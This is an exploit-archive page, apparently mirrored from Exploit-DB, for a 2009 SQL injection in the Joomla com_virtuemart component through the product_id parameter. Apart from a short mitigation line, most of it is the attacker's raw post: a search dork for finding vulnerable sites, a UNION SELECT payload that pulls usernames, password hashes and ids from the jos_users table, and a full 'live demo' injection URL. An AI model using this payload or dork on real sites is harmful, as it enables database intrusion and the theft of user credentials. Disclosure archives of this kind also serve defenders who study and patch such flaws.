header-logo
Suggest Exploit
vendor:
Virtuemart
by:
SOA Crew a.k.a Neo-GabrieL
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: Virtuemart
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: virtuemart.net
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_virtuemart SQL injection vulnerability (product_id)

A SQL injection vulnerability exists in Joomla Component com_virtuemart, which allows an attacker to execute arbitrary SQL commands via the 'product_id' parameter in a 'shop.product_details' page request.

Mitigation:

Ensure that user-supplied input is validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

[#] Title:
Joomla Component com_virtuemart SQL injection vulnerability (product_id)

[#] Author: 
SOA Crew a.k.a Neo-GabrieL
[gabriel_666@rocketmail.com]
visit us:
http://indonesianhacker.com/

**********************************/

[#] Software Information
 Vendor : http://virtuemart.net/
 Download : -
 Version : 1.0
 Vulnerability : SQL injection
 Dork : inurl:"com_virtuemart"
 Price : Free
 Date : 07-12-09
================================================

[#] Vulnerable
http://localhost/index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SOA injection]

[#] Exploit
6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users--

[#] Ex. Query
+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1-

[#] Live Demo
http://site.com/index.php?page=shop.product_details&flypage=shop.flypage&product_id=6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)Gabriel,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1

**********************************/

[#] Thx to
- HI Cyber4rt crew 
[Facebook: Hacker Indonesia]
- all Soldier of Allah, Tecon Crew, Jatimcrew, Indonesian Hacker and specially for YOU

Navigation

Suggest Exploit

Services By CQR